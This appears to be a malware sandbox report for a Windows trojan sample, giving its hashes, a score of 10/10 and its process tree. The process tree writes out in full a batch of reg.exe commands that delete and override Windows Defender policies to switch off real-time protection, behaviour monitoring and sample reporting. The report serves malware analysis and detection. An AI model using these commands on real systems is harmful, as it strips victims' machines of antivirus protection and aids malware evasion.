Overview

overview

10

Static

static

d46ed35f93...cf.exe

windows7_x64

10

d46ed35f93...cf.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    40s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 22:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe

  • Size

    90KB

  • MD5

    85340d7bc64e23ba2c61f9612c369148

  • SHA1

    38e2ada88a258f16391b6d2ec2e1ff462b2e8fd3

  • SHA256

    d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf

  • SHA512

    48806f8afa726c200a26fc7c8235e542b63e2026b2f88df8508caee25681ea5e415e22982ee45ebb147c0166be34d407c3ced90b49e0719a1fd31a643b2a0e20

Score
10/10
evasiontrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe
    "C:\Users\Admin\AppData\Local\Temp\d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DB8.tmp\DC8.tmp\DC9.bat C:\Users\Admin\AppData\Local\Temp\d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:904
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
          PID:1312
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          3⤵
            PID:1748
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            3⤵
              PID:1948
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
              3⤵
                PID:1000
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                3⤵
                  PID:2024
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                  3⤵
                    PID:684
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    3⤵
                      PID:1996
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                      3⤵
                        PID:2008
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                        3⤵
                          PID:564
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                          3⤵
                            PID:1976
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                            3⤵
                              PID:1960
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                              3⤵
                                PID:1728
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                3⤵
                                  PID:1760

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Initial Access

                            Execution

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Privilege Escalation

                            Defense Evasion

                            Modify Registry

                            1
                            T1112

                            Disabling Security Tools

                            1
                            T1089

                            Credential Access

                            Discovery

                            Lateral Movement

                            Collection

                            Exfiltration

                            Command and Control

                            Impact

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Temp\DB8.tmp\DC8.tmp\DC9.bat
                              Filesize

                              1KB

                              MD5

                              509170ad1804d3092fa6c5cf530e017f

                              SHA1

                              3fb5b0dee2231ef6e7d0f71b6af5b298f109c2c4

                              SHA256

                              7a1f7876c4cdbc2010f08f143347f6c037c558ff57a3209cb5a56644e385280d

                              SHA512

                              ef12b29934cb19fe87e7014f6cbd22e23c1b77f3841ecd06b980e72d6c067f9b1a32524b5985c70f1537cecbad8286a73925de3b87e396cf19bb6580e828ee58

                              Download Submit
                            • memory/564-65-0x0000000000000000-mapping.dmp
                              Download
                            • memory/684-62-0x0000000000000000-mapping.dmp
                              Download
                            • memory/904-55-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1000-60-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1312-57-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1532-54-0x0000000075581000-0x0000000075583000-memory.dmp
                              Filesize

                              8KB

                              Download
                            • memory/1728-68-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1748-58-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1760-69-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1948-59-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1960-67-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1976-66-0x0000000000000000-mapping.dmp
                              Download
                            • memory/1996-63-0x0000000000000000-mapping.dmp
                              Download
                            • memory/2008-64-0x0000000000000000-mapping.dmp
                              Download
                            • memory/2024-61-0x0000000000000000-mapping.dmp
                              Download